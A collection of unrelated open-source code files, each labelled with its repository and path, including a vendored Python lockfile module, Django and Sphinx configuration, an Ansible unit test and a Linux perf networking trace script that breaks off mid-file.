diagonal : Return specified diagonals. trace : Sum along diagonals. Examples -------- >>> np.diagflat([[1,2], [3,4]]) array([[1, 0, 0, 0], [0, 2, 0, 0], [0, 0, 3, 0], [0, 0, 0, 4]]) >>> np.diagflat([1,2], 1) array([[0, 1, 0], [0, 0, 2], [0, 0, 0]]) """ return _npi.diagflat(v, k=k) @set_module('mxnet.symbol.numpy') def diagonal(a, offset=0, axis1=0, axis2=1): """ If a is 2-D, returns the diagonal of a with the given offset, i.e., the collection of elements of the form a[i, i+offset]. If a has more than two dimensions, then the axes specified by axis1 and axis2 are used to determine the 2-D sub-array whose diagonal is returned. The shape of the resulting array can be determined by removing axis1 and axis2 and appending an index to the right equal to the size of the resulting diagonals. Parameters ---------- a : _Symbol Input data from which diagonal are taken. offset: int, Optional Offset of the diagonal from the main diagonal axis1: int, Optional Axis to be used as the first axis of the 2-D sub-arrays axis2: int, Optional Axis to be used as the second axis of the 2-D sub-arrays Returns ------- out : _Symbol Output result Raises ------- ValueError: If the dimension of a is less than 2. """ return _npi.diagonal(a, offset=offset, axis1=axis1, axis2=axis2) # pylint:disable=redefined-outer-name, too-many-arguments @set_module('mxnet.symbol.numpy') def sum(a, axis=None, dtype=None, out=None, keepdims=False, initial=None, where=None): r""" Sum of array elements over a given axis. Parameters ---------- a : _Symbol Input data. axis : None or int, optional Axis or axes along which a sum is performed. The default, axis=None, will sum all of the elements of the input array. If axis is negative it counts from the last to the first axis. dtype : dtype, optional The type of the returned array and of the accumulator in which the elements are summed. The default type is float32. 
keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the input array. If the default value is passed, then `keepdims` will not be passed through to the `sum` method of sub-classes of `ndarray`, however any non-default value will be. If the sub-classes `sum` method does not implement `keepdims` any exceptions will be raised. initial: Currently only supports None as input, optional Starting value for the sum. Currently not implemented. Please use ``None`` as input or skip this argument. out : ndarray or None, optional Alternative output array in which to place the result. It must have the same shape and dtype as the expected output. Returns ------- sum_along_axis : _Symbol An ndarray with the same shape as `a`, with the specified axis removed. If an output array is specified, a reference to `out` is returned. """ if where is not None and where is not True: raise ValueError("only where=None or where=True cases are supported for now") return _npi.sum(a, axis=axis, dtype=dtype, keepdims=keepdims, initial=initial, out=out) # pylint:enable=redefined-outer-name, too-many-arguments _set_np_symbol_class(_Symbol)
yd0str/infernal-twin
refs/heads/master
build/pip/build/lib.linux-i686-2.7/pip/_vendor/lockfile/__init__.py
475
""" lockfile.py - Platform-independent advisory file locks. Requires Python 2.5 unless you apply 2.4.diff Locking is done on a per-thread basis instead of a per-process basis. Usage: >>> lock = LockFile('somefile') >>> try: ... lock.acquire() ... except AlreadyLocked: ... print 'somefile', 'is locked already.' ... except LockFailed: ... print 'somefile', 'can\\'t be locked.' ... else: ... print 'got lock' got lock >>> print lock.is_locked() True >>> lock.release() >>> lock = LockFile('somefile') >>> print lock.is_locked() False >>> with lock: ... print lock.is_locked() True >>> print lock.is_locked() False >>> lock = LockFile('somefile') >>> # It is okay to lock twice from the same thread... >>> with lock: ... lock.acquire() ... >>> # Though no counter is kept, so you can't unlock multiple times... >>> print lock.is_locked() False Exceptions: Error - base class for other exceptions LockError - base class for all locking exceptions AlreadyLocked - Another thread or process already holds the lock LockFailed - Lock failed for some other reason UnlockError - base class for all unlocking exceptions AlreadyUnlocked - File was not locked. NotMyLock - File was locked but not by the current thread/process """ from __future__ import absolute_import import sys import socket import os import threading import time import urllib import warnings import functools # Work with PEP8 and non-PEP8 versions of threading module. if not hasattr(threading, "current_thread"): threading.current_thread = threading.currentThread if not hasattr(threading.Thread, "get_name"): threading.Thread.get_name = threading.Thread.getName __all__ = ['Error', 'LockError', 'LockTimeout', 'AlreadyLocked', 'LockFailed', 'UnlockError', 'NotLocked', 'NotMyLock', 'LinkLockFile', 'MkdirLockFile', 'SQLiteLockFile', 'LockBase', 'locked'] class Error(Exception): """ Base class for other exceptions. >>> try: ... raise Error ... except Exception: ... 
pass """ pass class LockError(Error): """ Base class for error arising from attempts to acquire the lock. >>> try: ... raise LockError ... except Error: ... pass """ pass class LockTimeout(LockError): """Raised when lock creation fails within a user-defined period of time. >>> try: ... raise LockTimeout ... except LockError: ... pass """ pass class AlreadyLocked(LockError): """Some other thread/process is locking the file. >>> try: ... raise AlreadyLocked ... except LockError: ... pass """ pass class LockFailed(LockError): """Lock file creation failed for some other reason. >>> try: ... raise LockFailed ... except LockError: ... pass """ pass class UnlockError(Error): """ Base class for errors arising from attempts to release the lock. >>> try: ... raise UnlockError ... except Error: ... pass """ pass class NotLocked(UnlockError): """Raised when an attempt is made to unlock an unlocked file. >>> try: ... raise NotLocked ... except UnlockError: ... pass """ pass class NotMyLock(UnlockError): """Raised when an attempt is made to unlock a file someone else locked. >>> try: ... raise NotMyLock ... except UnlockError: ... pass """ pass class LockBase: """Base class for platform-specific lock classes.""" def __init__(self, path, threaded=True, timeout=None): """ >>> lock = LockBase('somefile') >>> lock = LockBase('somefile', threaded=False) """ self.path = path self.lock_file = os.path.abspath(path) + ".lock" self.hostname = socket.gethostname() self.pid = os.getpid() if threaded: t = threading.current_thread() # Thread objects in Python 2.4 and earlier do not have ident # attrs. Worm around that. 
ident = getattr(t, "ident", hash(t)) self.tname = "-%x" % (ident & 0xffffffff) else: self.tname = "" dirname = os.path.dirname(self.lock_file) # unique name is mostly about the current process, but must # also contain the path -- otherwise, two adjacent locked # files conflict (one file gets locked, creating lock-file and # unique file, the other one gets locked, creating lock-file # and overwriting the already existing lock-file, then one # gets unlocked, deleting both lock-file and unique file, # finally the last lock errors out upon releasing. self.unique_name = os.path.join(dirname, "%s%s.%s%s" % (self.hostname, self.tname, self.pid, hash(self.path))) self.timeout = timeout def acquire(self, timeout=None): """ Acquire the lock. * If timeout is omitted (or None), wait forever trying to lock the file. * If timeout > 0, try to acquire the lock for that many seconds. If the lock period expires and the file is still locked, raise LockTimeout. * If timeout <= 0, raise AlreadyLocked immediately if the file is already locked. """ raise NotImplemented("implement in subclass") def release(self): """ Release the lock. If the file is not locked, raise NotLocked. """ raise NotImplemented("implement in subclass") def is_locked(self): """ Tell whether or not the file is locked. """ raise NotImplemented("implement in subclass") def i_am_locking(self): """ Return True if this object is locking the file. """ raise NotImplemented("implement in subclass") def break_lock(self): """ Remove a lock. Useful if a locking thread failed to unlock. """ raise NotImplemented("implement in subclass") def __enter__(self): """ Context manager support. """ self.acquire() return self def __exit__(self, *_exc): """ Context manager support. 
""" self.release() def __repr__(self): return "<%s: %r -- %r>" % (self.__class__.__name__, self.unique_name, self.path) def _fl_helper(cls, mod, *args, **kwds): warnings.warn("Import from %s module instead of lockfile package" % mod, DeprecationWarning, stacklevel=2) # This is a bit funky, but it's only for awhile. The way the unit tests # are constructed this function winds up as an unbound method, so it # actually takes three args, not two. We want to toss out self. if not isinstance(args[0], str): # We are testing, avoid the first arg args = args[1:] if len(args) == 1 and not kwds: kwds["threaded"] = True return cls(*args, **kwds) def LinkFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import LinkLockFile from the lockfile.linklockfile module. """ from . import linklockfile return _fl_helper(linklockfile.LinkLockFile, "lockfile.linklockfile", *args, **kwds) def MkdirFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import MkdirLockFile from the lockfile.mkdirlockfile module. """ from . import mkdirlockfile return _fl_helper(mkdirlockfile.MkdirLockFile, "lockfile.mkdirlockfile", *args, **kwds) def SQLiteFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import SQLiteLockFile from the lockfile.mkdirlockfile module. """ from . import sqlitelockfile return _fl_helper(sqlitelockfile.SQLiteLockFile, "lockfile.sqlitelockfile", *args, **kwds) def locked(path, timeout=None): """Decorator which enables locks for decorated function. Arguments: - path: path for lockfile. - timeout (optional): Timeout for acquiring lock. Usage: @locked('/var/run/myname', timeout=0) def myname(...): ... 
""" def decor(func): @functools.wraps(func) def wrapper(*args, **kwargs): lock = FileLock(path, timeout=timeout) lock.acquire() try: return func(*args, **kwargs) finally: lock.release() return wrapper return decor if hasattr(os, "link"): from . import linklockfile as _llf LockFile = _llf.LinkLockFile else: from . import mkdirlockfile as _mlf LockFile = _mlf.MkdirLockFile FileLock = LockFile
qingpengchen2011/algorithm-study
refs/heads/master
algo-analyse/week6/2-sum/test_gen.py
1
# Generate input files for the 2-sum test cases: one file per problem size,
# each holding a deterministic pseudo-random sequence of signed integers,
# one value per line.  (Python 2 script: uses xrange and integer division.)

# Pre-allocate the full table of one million values.
a = [0] * 1000000;
t = 0;
# Modulus for the linear congruential generator below (2**24).
modulus = 2 ** 24;

# Fill `a` with an LCG sequence, re-centred around zero by subtracting
# modulus / 2 (integer division under Python 2), so values span
# roughly [-2**23, 2**23).
for i in xrange(1000000) :
    t = (615949*t + 797807) % modulus
    a[i] = t - modulus / 2

# Write prefixes of increasing length to files named sum2tc_<n>.txt; each
# smaller case is a strict prefix of the larger ones.
for i in (20,100,1000,10000,100000,1000000) :
    fname = "sum2tc_%d.txt" % i
    f = open(fname,"w")
    for j in xrange(i) :
        f.write("%d\n" % a[j])
    f.close()
ttglennhall/DjangoGirlsTutorial
refs/heads/master
myvenv/lib/python3.4/site-packages/django/conf/locale/sq/formats.py
619
# -*- encoding: utf-8 -*- # This file is distributed under the same license as the Django package. # from __future__ import unicode_literals # The *_FORMAT strings use the Django date format syntax, # see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date DATE_FORMAT = 'd F Y' TIME_FORMAT = 'g.i.A' # DATETIME_FORMAT = YEAR_MONTH_FORMAT = 'F Y' MONTH_DAY_FORMAT = 'j F' SHORT_DATE_FORMAT = 'Y-m-d' # SHORT_DATETIME_FORMAT = # FIRST_DAY_OF_WEEK = # The *_INPUT_FORMATS strings use the Python strftime format syntax, # see http://docs.python.org/library/datetime.html#strftime-strptime-behavior # DATE_INPUT_FORMATS = # TIME_INPUT_FORMATS = # DATETIME_INPUT_FORMATS = DECIMAL_SEPARATOR = ',' THOUSAND_SEPARATOR = '.' # NUMBER_GROUPING =
maxamillion/ansible
refs/heads/devel
test/units/module_utils/basic/test_tmpdir.py
35
# -*- coding: utf-8 -*-
# Copyright (c) 2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

import json
import os
import shutil
import tempfile

import pytest

from units.compat.mock import patch, MagicMock
from ansible.module_utils._text import to_bytes

from ansible.module_utils import basic


class TestAnsibleModuleTmpDir:
    """Tests for the lazily-created ``AnsibleModule.tmpdir`` property."""

    # Each entry is (module internal args, remote tmp dir already exists?,
    # expected tmpdir path).  time.time() is patched to 42 in the test,
    # which is why the generated directory names contain "-42-".
    DATA = (
        (
            {
                "_ansible_tmpdir": "/path/to/dir",
                "_ansible_remote_tmp": "/path/tmpdir",
                "_ansible_keep_remote_files": False,
            },
            True,
            "/path/to/dir"
        ),
        (
            {
                "_ansible_tmpdir": None,
                "_ansible_remote_tmp": "/path/tmpdir",
                "_ansible_keep_remote_files": False
            },
            False,
            "/path/tmpdir/ansible-moduletmp-42-"
        ),
        (
            {
                "_ansible_tmpdir": None,
                "_ansible_remote_tmp": "/path/tmpdir",
                "_ansible_keep_remote_files": False
            },
            True,
            "/path/tmpdir/ansible-moduletmp-42-"
        ),
        (
            {
                "_ansible_tmpdir": None,
                "_ansible_remote_tmp": "$HOME/.test",
                "_ansible_keep_remote_files": False
            },
            False,
            os.path.join(os.environ['HOME'], ".test/ansible-moduletmp-42-")
        ),
    )

    # pylint bug: https://github.com/PyCQA/pylint/issues/511
    # pylint: disable=undefined-variable
    # DATA stores (args, stat_exists, expected); the generator below reorders
    # each entry to match the parametrize names (args, expected, stat_exists).
    @pytest.mark.parametrize('args, expected, stat_exists', ((s, e, t) for s, t, e in DATA))
    def test_tmpdir_property(self, monkeypatch, args, expected, stat_exists):
        """tmpdir honours an explicit _ansible_tmpdir and otherwise creates
        a mkdtemp dir under _ansible_remote_tmp (making it if missing)."""
        # Records whether/how os.makedirs was called by the property.
        makedirs = {'called': False}

        # Deterministic mkdtemp stand-in: just join dir + prefix, no I/O.
        def mock_mkdtemp(prefix, dir):
            return os.path.join(dir, prefix)

        # Capture the makedirs call instead of touching the filesystem.
        def mock_makedirs(path, mode):
            makedirs['called'] = True
            makedirs['path'] = path
            makedirs['mode'] = mode
            return

        monkeypatch.setattr(tempfile, 'mkdtemp', mock_mkdtemp)
        # stat_exists controls whether the remote tmp parent "exists".
        monkeypatch.setattr(os.path, 'exists', lambda x: stat_exists)
        monkeypatch.setattr(os, 'makedirs', mock_makedirs)
        monkeypatch.setattr(shutil, 'rmtree', lambda x: None)
        # Feed the module args via the raw stdin blob AnsibleModule parses.
        monkeypatch.setattr(basic, '_ANSIBLE_ARGS', to_bytes(json.dumps({'ANSIBLE_MODULE_ARGS': args})))

        with patch('time.time', return_value=42):
            am = basic.AnsibleModule(argument_spec={})
            actual_tmpdir = am.tmpdir

        assert actual_tmpdir == expected

        # verify subsequent calls always produces the same tmpdir
        assert am.tmpdir == actual_tmpdir

        if not stat_exists:
            # Missing parent must have been created with owner-only perms.
            assert makedirs['called']
            expected = os.path.expanduser(os.path.expandvars(am._remote_tmp))
            assert makedirs['path'] == expected
            assert makedirs['mode'] == 0o700

    @pytest.mark.parametrize('stdin', ({"_ansible_tmpdir": None,
                                        "_ansible_remote_tmp": "$HOME/.test",
                                        "_ansible_keep_remote_files": True},),
                             indirect=['stdin'])
    def test_tmpdir_makedirs_failure(self, am, monkeypatch):
        """If creating the remote tmp parent fails, tmpdir falls back to the
        system temp directory (mkdtemp called with dir=None)."""

        mock_mkdtemp = MagicMock(return_value="/tmp/path")
        mock_makedirs = MagicMock(side_effect=OSError("Some OS Error here"))

        monkeypatch.setattr(tempfile, 'mkdtemp', mock_mkdtemp)
        monkeypatch.setattr(os.path, 'exists', lambda x: False)
        monkeypatch.setattr(os, 'makedirs', mock_makedirs)

        actual = am.tmpdir
        assert actual == "/tmp/path"
        assert mock_makedirs.call_args[0] == (os.path.expanduser(os.path.expandvars("$HOME/.test")),)
        assert mock_makedirs.call_args[1] == {"mode": 0o700}

        # because makedirs failed the dir should be None so it uses the System tmp
        assert mock_mkdtemp.call_args[1]['dir'] is None
        assert mock_mkdtemp.call_args[1]['prefix'].startswith("ansible-moduletmp-")
neumerance/cloudloon2
refs/heads/master
.venv/lib/python2.7/site-packages/sphinx/websupport/search/whooshsearch.py
5
# -*- coding: utf-8 -*-
"""
    sphinx.websupport.search.whooshsearch
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Whoosh search adapter.

    :copyright: Copyright 2007-2011 by the Sphinx team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

from whoosh import index
from whoosh.fields import Schema, ID, TEXT
from whoosh.qparser import QueryParser
from whoosh.analysis import StemmingAnalyzer

from sphinx.util.osutil import ensuredir
from sphinx.websupport.search import BaseSearch


class WhooshSearch(BaseSearch):
    """The whoosh search adapter for sphinx web support."""

    # Define the Whoosh Schema for the search index.
    schema = Schema(path=ID(stored=True, unique=True),
                    title=TEXT(field_boost=2.0, stored=True),
                    text=TEXT(analyzer=StemmingAnalyzer(), stored=True))

    def __init__(self, db_path):
        """Open the Whoosh index under *db_path*, creating it if needed."""
        ensuredir(db_path)
        if index.exists_in(db_path):
            self.index = index.open_dir(db_path)
        else:
            self.index = index.create_in(db_path, schema=self.schema)
        self.qparser = QueryParser('text', self.schema)

    def init_indexing(self, changed=()):
        """Drop stale entries for *changed* paths and open a writer.

        The default was a mutable ``[]``; use an immutable tuple instead.
        The argument is only iterated, so behaviour is unchanged.
        """
        for changed_path in changed:
            self.index.delete_by_term('path', changed_path)
        self.index_writer = self.index.writer()

    def finish_indexing(self):
        """Commit all documents added since :meth:`init_indexing`."""
        self.index_writer.commit()

    def add_document(self, pagename, title, text):
        """Add one page to the pending index writer."""
        self.index_writer.add_document(path=unicode(pagename),
                                       title=title,
                                       text=text)

    def handle_query(self, q):
        """Run query string *q* and return (path, title, context) triples."""
        searcher = self.index.searcher()
        try:
            whoosh_results = searcher.search(self.qparser.parse(q))
            results = []
            for result in whoosh_results:
                context = self.extract_context(result['text'])
                results.append((result['path'], result.get('title', ''),
                                context))
            return results
        finally:
            # Previously the searcher was never closed, leaking its open
            # index file handles on every query.
            searcher.close()
thomasf/offlineimap
refs/heads/master
docs/doc-src/conf.py
9
# -*- coding: utf-8 -*- # # pyDNS documentation build configuration file, created by # sphinx-quickstart on Tue Feb 2 10:00:47 2010. # # This file is execfile()d with the current directory set to its containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys, os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath('../..')) from offlineimap import __version__, __bigversion__, __author__, __copyright__ # -- General configuration ----------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.viewcode'] autoclass_content = "both" # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8' # The master toctree document. master_doc = 'index' # General information about the project. project = u'OfflineIMAP' copyright = __copyright__ # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = __version__ # The full version, including alpha/beta/rc tags. release = __bigversion__ # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. 
#language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. #unused_docs = [] # List of directories, relative to source directory, that shouldn't be searched # for source files. exclude_trees = [] # The reST default role (used for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). add_module_names = False # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output --------------------------------------------------- # The theme to use for HTML and HTML Help pages. Major themes that come with # Sphinx are currently 'default' and 'sphinxdoc'. html_theme = 'default' #html_style = '' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. 
#html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". #html_static_path = ['html'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. html_use_modindex = False # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = '' # Output file base name for HTML help builder. htmlhelp_basename = 'dev-doc' # -- Options for LaTeX output -------------------------------------------------- # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. 
List of tuples # (source start file, target name, title, author, documentclass [howto/manual]). latex_documents = [ ('index', 'offlineimap.tex', u'OfflineIMAP Documentation', u'OfflineIMAP contributors', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # Additional stuff for the LaTeX preamble. #latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_use_modindex = True # Example configuration for intersphinx: refer to the Python standard library. intersphinx_mapping = {'http://docs.python.org/': None}
loic/django
refs/heads/master
tests/urlpatterns_reverse/included_app_urls.py
405
# URLconf used by the urlpatterns_reverse tests to exercise reverse()
# through an include()d, namespaced application.
from django.conf.urls import url

from . import views

# Application namespace: reverse() lookups address these patterns as
# 'inc-app:<name>'.
app_name = 'inc-app'

urlpatterns = [
    url(r'^normal/$', views.empty_view, name='inc-normal-view'),
    # Same name as above with required args -- tests arg-based disambiguation.
    url(r'^normal/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='inc-normal-view'),
    # Pattern made entirely of escaped regex metacharacters ('+\$*').
    url(r'^\+\\\$\*/$', views.empty_view, name='inc-special-view'),
    # Mix of positional and named groups in a single pattern.
    url(r'^mixed_args/([0-9]+)/(?P<arg2>[0-9]+)/$', views.empty_view, name='inc-mixed-args'),
    url(r'^no_kwargs/([0-9]+)/([0-9]+)/$', views.empty_view, name='inc-no-kwargs'),
    # Class-based view instance instead of a function view.
    url(r'^view_class/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$', views.view_class_instance, name='inc-view-class'),
]
RobAltena/deeplearning4j
refs/heads/master
jumpy/jumpy/matlib.py
2
################################################################################
# Copyright (c) 2015-2018 Skymind, Inc.
#
# This program and the accompanying materials are made available under the
# terms of the Apache License, Version 2.0 which is available at
# https://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# SPDX-License-Identifier: Apache-2.0
################################################################################

from .ndarray import ndarray
from .java_classes import Nd4j


def _unwrap(array):
    # Normalize any accepted input into the backing INDArray.
    return ndarray(array).array


def zeros(shape):
    """Return a new jumpy array of the given shape, filled with zeros."""
    return ndarray(Nd4j.zeros(*shape))


def ones(shape):
    """Return a new jumpy array of the given shape, filled with ones."""
    return ndarray(Nd4j.ones(*shape))


def zeros_like(array):
    """Return an all-zeros array with the same shape as *array*."""
    return ndarray(Nd4j.zerosLike(_unwrap(array)))


def ones_like(array):
    """Return an all-ones array with the same shape as *array*."""
    return ndarray(Nd4j.onesLike(_unwrap(array)))


def eye(size):
    """Return a *size* x *size* identity matrix."""
    return ndarray(Nd4j.eye(size))


def arange(m, n=None):
    """Return values in [0, m) when *n* is omitted, otherwise [m, n)."""
    bounds = (m,) if n is None else (m, n)
    return ndarray(Nd4j.arange(*bounds))


def linspace(start, stop, num):
    """Return *num* evenly spaced values from *start* to *stop*."""
    return ndarray(Nd4j.linspace(start, stop, num))
xcstacy/kernel-N8000
refs/heads/master
tools/perf/scripts/python/netdev-times.py
11271
# Display a process of packets and processed time. # It helps us to investigate networking or network device. # # options # tx: show only tx chart # rx: show only rx chart # dev=: show only thing related to specified device # debug: work with debug mode. It shows buffer status. import os import sys sys.path.append(os.environ['PERF_EXEC_PATH'] + \ '/scripts/python/Perf-Trace-Util/lib/Perf/Trace') from perf_trace_context import * from Core import * from Util import * all_event_list = []; # insert all tracepoint event related with this script irq_dic = {}; # key is cpu and value is a list which stacks irqs # which raise NET_RX softirq net_rx_dic = {}; # key is cpu and value include time of NET_RX softirq-entry # and a list which stacks receive receive_hunk_list = []; # a list which include a sequence of receive events rx_skb_list = []; # received packet list for matching # skb_copy_datagram_iovec buffer_budget = 65536; # the budget of rx_skb_list, tx_queue_list and # tx_xmit_list of_count_rx_skb_list = 0; # overflow count tx_queue_list = []; # list of packets which pass through dev_queue_xmit of_count_tx_queue_list = 0; # overflow count tx_xmit_list = []; # list of packets which pass through dev_hard_start_xmit of_count_tx_xmit_list = 0; # overflow count tx_free_list = []; # list of packets which is freed # options show_tx = 0; show_rx = 0; dev = 0; # store a name of device specified by option "dev=" debug = 0; # indices of event_info tuple EINFO_IDX_NAME= 0 EINFO_IDX_CONTEXT=1 EINFO_IDX_CPU= 2 EINFO_IDX_TIME= 3 EINFO_IDX_PID= 4 EINFO_IDX_COMM= 5 # Calculate a time interval(msec) from src(nsec) to dst(nsec) def diff_msec(src, dst): return (dst - src) / 1000000.0 # Display a process of transmitting a packet def print_transmit(hunk): if dev != 0 and hunk['dev'].find(dev) < 0: return print "%7s %5d %6d.%06dsec %12.3fmsec %12.3fmsec" % \ (hunk['dev'], hunk['len'], nsecs_secs(hunk['queue_t']), nsecs_nsecs(hunk['queue_t'])/1000, diff_msec(hunk['queue_t'], hunk['xmit_t']), 
diff_msec(hunk['xmit_t'], hunk['free_t'])) # Format for displaying rx packet processing PF_IRQ_ENTRY= " irq_entry(+%.3fmsec irq=%d:%s)" PF_SOFT_ENTRY=" softirq_entry(+%.3fmsec)" PF_NAPI_POLL= " napi_poll_exit(+%.3fmsec %s)" PF_JOINT= " |" PF_WJOINT= " | |" PF_NET_RECV= " |---netif_receive_skb(+%.3fmsec skb=%x len=%d)" PF_NET_RX= " |---netif_rx(+%.3fmsec skb=%x)" PF_CPY_DGRAM= " | skb_copy_datagram_iovec(+%.3fmsec %d:%s)" PF_KFREE_SKB= " | kfree_skb(+%.3fmsec location=%x)" PF_CONS_SKB= " | consume_skb(+%.3fmsec)" # Display a process of received packets and interrputs associated with # a NET_RX softirq def print_receive(hunk): show_hunk = 0 irq_list = hunk['irq_list'] cpu = irq_list[0]['cpu'] base_t = irq_list[0]['irq_ent_t'] # check if this hunk should be showed if dev != 0: for i in range(len(irq_list)): if irq_list[i]['name'].find(dev) >= 0: show_hunk = 1 break else: show_hunk = 1 if show_hunk == 0: return print "%d.%06dsec cpu=%d" % \ (nsecs_secs(base_t), nsecs_nsecs(base_t)/1000, cpu) for i in range(len(irq_list)): print PF_IRQ_ENTRY % \ (diff_msec(base_t, irq_list[i]['irq_ent_t']), irq_list[i]['irq'], irq_list[i]['name']) print PF_JOINT irq_event_list = irq_list[i]['event_list'] for j in range(len(irq_event_list)): irq_event = irq_event_list[j] if irq_event['event'] == 'netif_rx': print PF_NET_RX % \ (diff_msec(base_t, irq_event['time']), irq_event['skbaddr']) print PF_JOINT print PF_SOFT_ENTRY % \ diff_msec(base_t, hunk['sirq_ent_t']) print PF_JOINT event_list = hunk['event_list'] for i in range(len(event_list)): event = event_list[i] if event['event_name'] == 'napi_poll': print PF_NAPI_POLL % \ (diff_msec(base_t, event['event_t']), event['dev']) if i == len(event_list) - 1: print "" else: print PF_JOINT else: print PF_NET_RECV % \ (diff_msec(base_t, event['event_t']), event['skbaddr'], event['len']) if 'comm' in event.keys(): print PF_WJOINT print PF_CPY_DGRAM % \ (diff_msec(base_t, event['comm_t']), event['pid'], event['comm']) elif 'handle' in event.keys(): 
print PF_WJOINT if event['handle'] == "kfree_skb": print PF_KFREE_SKB % \ (diff_msec(base_t, event['comm_t']), event['location']) elif event['handle'] == "consume_skb": print PF_CONS_SKB % \ diff_msec(base_t, event['comm_t']) print PF_JOINT def trace_begin(): global show_tx global show_rx global dev global debug for i in range(len(sys.argv)): if i == 0: continue arg = sys.argv[i] if arg == 'tx': show_tx = 1 elif arg =='rx': show_rx = 1 elif arg.find('dev=',0, 4) >= 0: dev = arg[4:] elif arg == 'debug': debug = 1 if show_tx == 0 and show_rx == 0: show_tx = 1 show_rx = 1 def trace_end(): # order all events in time all_event_list.sort(lambda a,b :cmp(a[EINFO_IDX_TIME], b[EINFO_IDX_TIME])) # process all events for i in range(len(all_event_list)): event_info = all_event_list[i] name = event_info[EINFO_IDX_NAME] if name == 'irq__softirq_exit': handle_irq_softirq_exit(event_info) elif name == 'irq__softirq_entry': handle_irq_softirq_entry(event_info) elif name == 'irq__softirq_raise': handle_irq_softirq_raise(event_info) elif name == 'irq__irq_handler_entry': handle_irq_handler_entry(event_info) elif name == 'irq__irq_handler_exit': handle_irq_handler_exit(event_info) elif name == 'napi__napi_poll': handle_napi_poll(event_info) elif name == 'net__netif_receive_skb': handle_netif_receive_skb(event_info) elif name == 'net__netif_rx': handle_netif_rx(event_info) elif name == 'skb__skb_copy_datagram_iovec': handle_skb_copy_datagram_iovec(event_info) elif name == 'net__net_dev_queue': handle_net_dev_queue(event_info) elif name == 'net__net_dev_xmit': handle_net_dev_xmit(event_info) elif name == 'skb__kfree_skb': handle_kfree_skb(event_info) elif name == 'skb__consume_skb': handle_consume_skb(event_info) # display receive hunks if show_rx: for i in range(len(receive_hunk_list)): print_receive(receive_hunk_list[i]) # display transmit hunks if show_tx: print " dev len Qdisc " \ " netdevice free" for i in range(len(tx_free_list)): print_transmit(tx_free_list[i]) if debug: print 
